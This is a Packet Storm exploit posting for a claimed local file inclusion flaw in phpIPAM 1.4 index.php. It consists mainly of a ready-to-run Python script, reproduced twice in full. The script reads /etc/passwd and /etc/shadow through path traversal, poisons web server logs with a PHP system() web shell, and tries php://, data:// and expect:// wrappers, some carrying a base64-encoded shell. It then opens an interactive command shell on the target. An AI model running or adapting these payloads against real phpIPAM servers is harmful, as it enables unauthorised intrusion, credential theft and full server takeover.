Description
A critical local file inclusion vulnerability exists in in index.php in phpIPAM version 1.4. Attackers can exploit this to read sensitive system files and potentially perform remote code execution...
Basic Information
ID
PACKETSTORM:215599
Published
Feb 16, 2026 at 00:00
Affected Product
Affected Versions
phpIPAM 1.4 LFI to RCE Exploit
=============================================================================================================================================
| # Title : phpIPAM 1.4 LFI to RCE Exploit
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2
(64 bits) |
| # Vendor : https://github.com/phpipam/phpipam/blob/master/index.php
|
=============================================================================================================================================
[+] Summary : A critical Local File Inclusion (LFI) vulnerability exists
in phpIPAM's main index.php file due to insufficient input validation
when including page files. Attackers can exploit this to
read sensitive system files, potentially escalate to Remote Code Execution
(RCE),
and gain complete control of the server.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
phpIPAM LFI to RCE Exploit
"""
import requests
import sys
import urllib.parse
class phpIPAM_Exploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
def check_lfi(self, path):
"""اختبار تضمين الملفات"""
params = {'page': path}
response = self.session.get(f"{self.target}/index.php",
params=params)
return response
def exploit_proc_self_environ(self):
"""استغلال /proc/self/environ"""
print("[*] Testing /proc/self/environ LFI...")
# أولاً: حقن PHP في User-Agent
headers = {
'User-Agent': '<?php system($_GET["cmd"]); ?>'
}
response = self.session.get(self.target, headers=headers)
# ثانياً: تضمين ملف السجل
log_paths = [
'/var/log/apache2/access.log',
'/var/log/httpd/access_log',
'/var/log/nginx/access.log',
'/proc/self/environ',
'/proc/self/fd/0'
]
for path in log_paths:
print(f"[*] Trying {path}...")
response = self.check_lfi(f"../../../../{path}")
if 'PHP' in response.text or 'php' in response.text:
print(f"[+] Possible LFI found: {path}")
# اختبار تنفيذ الأوامر
cmd_response = self.session.get(
f"{self.target}/index.php",
params={'page': f'../../../../{path}', 'cmd':
'whoami'}
)
if cmd_response.status_code == 200:
print("[+] RCE successful!")
return True
return False
def upload_and_include(self, php_code):
"""رفع وتضمين ملف مؤقت (إذا كان هناك رفع ملفات)"""
# هذا يتطلب ثغرة رفع ملفات أيضًا
print("[*] Trying to upload and include PHP file...")
# PHP shell base64 encoded
shell = "<?php echo
base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"
# محاولة تضمين ملفات /tmp
tmp_files = [
'/tmp/sess_*',
'/tmp/php*',
'/tmp/upload*'
]
for pattern in tmp_files:
for i in range(100):
filename = pattern.replace('*', str(i))
response = self.check_lfi(f"../../../../{filename}")
if 'uid=' in response.text or 'root' in
response.text.lower():
print(f"[+] Found vulnerable temp file: {filename}")
return filename
return None
def interactive_shell(self, lfi_path):
"""قشرة تفاعلية بعد الاستغلال"""
print(f"\n[+] Interactive shell via LFI: {lfi_path}")
print("[+] Type 'exit' to quit\n")
while True:
cmd = input("shell").strip()
if cmd.lower() == 'exit':
break
params = {
'page': f'../../../../{lfi_path}',
'cmd': cmd
}
response = self.session.get(f"{self.target}/index.php",
params=params)
# استخراج الناتج
lines = response.text.split('\n')
for line in lines:
if line and not line.startswith(('<', '<?', '<!')) and
'html' not in line.lower():
print(line[:500]) # طباعة أول 500 حرف
def run(self):
"""تشغيل الاستغلال"""
print("[*] phpIPAM LFI/RFI Exploit")
print(f"[*] Target: {self.target}")
# اختبار LFI أساسي
test_files = [
'../../../../etc/passwd',
'../../../../etc/hosts',
'../../../../windows/win.ini',
'....//....//....//....//etc/passwd',
'..\\..\\..\\..\\windows\\win.ini'
]
for test in test_files:
print(f"[*] Testing: {test}")
response = self.check_lfi(test)
if 'root:' in response.text or '[extensions]' in
response.text:
print(f"[+] LFI confirmed with: {test}")
print(f"[+] Response preview: {response.text[:200]}")
# استغلال مباشر
self.interactive_shell(test.replace('../../../../', ''))
return True
# محاولات أخرى
if self.exploit_proc_self_environ():
return True
print("[-] No LFI vulnerability found")
return False
# استغلال يدوي
def manual_exploitation():
print("""
=== phpIPAM LFI/RFI Manual Exploitation ===
1. Basic LFI Test:
/index.php?page=../../../../etc/passwd
/index.php?page=../../../../etc/shadow
/index.php?page=../../../../windows/win.ini
2. Log Poisoning:
# Step 1: Inject PHP into logs
GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include the log file
/index.php?page=../../../../var/log/apache2/access.log&cmd=id
3. PHP Filters (if enabled):
/index.php?page=php://filter/convert.base64-encode/resource=config.php
/index.php?page=php://filter/resource=/etc/passwd
4. Data URI (if allow_url_include=On):
/index.php?page=data://text/plain,<?php phpinfo();?>
/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
5. Expect Wrapper (rare):
/index.php?page=expect://ls
""")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 phpipam_exploit.py <target_url>")
print("Example: python3 phpipam_exploit.py
http://localhost/phpipam")
manual_exploitation()
sys.exit(1)
target = sys.argv[1]
exploit = phpIPAM_Exploit(target)
exploit.run()
Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================
=============================================================================================================================================
| # Title : phpIPAM 1.4 LFI to RCE Exploit
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2
(64 bits) |
| # Vendor : https://github.com/phpipam/phpipam/blob/master/index.php
|
=============================================================================================================================================
[+] Summary : A critical Local File Inclusion (LFI) vulnerability exists
in phpIPAM's main index.php file due to insufficient input validation
when including page files. Attackers can exploit this to
read sensitive system files, potentially escalate to Remote Code Execution
(RCE),
and gain complete control of the server.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
phpIPAM LFI to RCE Exploit
"""
import requests
import sys
import urllib.parse
class phpIPAM_Exploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
def check_lfi(self, path):
"""اختبار تضمين الملفات"""
params = {'page': path}
response = self.session.get(f"{self.target}/index.php",
params=params)
return response
def exploit_proc_self_environ(self):
"""استغلال /proc/self/environ"""
print("[*] Testing /proc/self/environ LFI...")
# أولاً: حقن PHP في User-Agent
headers = {
'User-Agent': '<?php system($_GET["cmd"]); ?>'
}
response = self.session.get(self.target, headers=headers)
# ثانياً: تضمين ملف السجل
log_paths = [
'/var/log/apache2/access.log',
'/var/log/httpd/access_log',
'/var/log/nginx/access.log',
'/proc/self/environ',
'/proc/self/fd/0'
]
for path in log_paths:
print(f"[*] Trying {path}...")
response = self.check_lfi(f"../../../../{path}")
if 'PHP' in response.text or 'php' in response.text:
print(f"[+] Possible LFI found: {path}")
# اختبار تنفيذ الأوامر
cmd_response = self.session.get(
f"{self.target}/index.php",
params={'page': f'../../../../{path}', 'cmd':
'whoami'}
)
if cmd_response.status_code == 200:
print("[+] RCE successful!")
return True
return False
def upload_and_include(self, php_code):
"""رفع وتضمين ملف مؤقت (إذا كان هناك رفع ملفات)"""
# هذا يتطلب ثغرة رفع ملفات أيضًا
print("[*] Trying to upload and include PHP file...")
# PHP shell base64 encoded
shell = "<?php echo
base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"
# محاولة تضمين ملفات /tmp
tmp_files = [
'/tmp/sess_*',
'/tmp/php*',
'/tmp/upload*'
]
for pattern in tmp_files:
for i in range(100):
filename = pattern.replace('*', str(i))
response = self.check_lfi(f"../../../../{filename}")
if 'uid=' in response.text or 'root' in
response.text.lower():
print(f"[+] Found vulnerable temp file: {filename}")
return filename
return None
def interactive_shell(self, lfi_path):
"""قشرة تفاعلية بعد الاستغلال"""
print(f"\n[+] Interactive shell via LFI: {lfi_path}")
print("[+] Type 'exit' to quit\n")
while True:
cmd = input("shell").strip()
if cmd.lower() == 'exit':
break
params = {
'page': f'../../../../{lfi_path}',
'cmd': cmd
}
response = self.session.get(f"{self.target}/index.php",
params=params)
# استخراج الناتج
lines = response.text.split('\n')
for line in lines:
if line and not line.startswith(('<', '<?', '<!')) and
'html' not in line.lower():
print(line[:500]) # طباعة أول 500 حرف
def run(self):
"""تشغيل الاستغلال"""
print("[*] phpIPAM LFI/RFI Exploit")
print(f"[*] Target: {self.target}")
# اختبار LFI أساسي
test_files = [
'../../../../etc/passwd',
'../../../../etc/hosts',
'../../../../windows/win.ini',
'....//....//....//....//etc/passwd',
'..\\..\\..\\..\\windows\\win.ini'
]
for test in test_files:
print(f"[*] Testing: {test}")
response = self.check_lfi(test)
if 'root:' in response.text or '[extensions]' in
response.text:
print(f"[+] LFI confirmed with: {test}")
print(f"[+] Response preview: {response.text[:200]}")
# استغلال مباشر
self.interactive_shell(test.replace('../../../../', ''))
return True
# محاولات أخرى
if self.exploit_proc_self_environ():
return True
print("[-] No LFI vulnerability found")
return False
# استغلال يدوي
def manual_exploitation():
print("""
=== phpIPAM LFI/RFI Manual Exploitation ===
1. Basic LFI Test:
/index.php?page=../../../../etc/passwd
/index.php?page=../../../../etc/shadow
/index.php?page=../../../../windows/win.ini
2. Log Poisoning:
# Step 1: Inject PHP into logs
GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include the log file
/index.php?page=../../../../var/log/apache2/access.log&cmd=id
3. PHP Filters (if enabled):
/index.php?page=php://filter/convert.base64-encode/resource=config.php
/index.php?page=php://filter/resource=/etc/passwd
4. Data URI (if allow_url_include=On):
/index.php?page=data://text/plain,<?php phpinfo();?>
/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
5. Expect Wrapper (rare):
/index.php?page=expect://ls
""")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 phpipam_exploit.py <target_url>")
print("Example: python3 phpipam_exploit.py
http://localhost/phpipam")
manual_exploitation()
sys.exit(1)
target = sys.argv[1]
exploit = phpIPAM_Exploit(target)
exploit.run()
Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================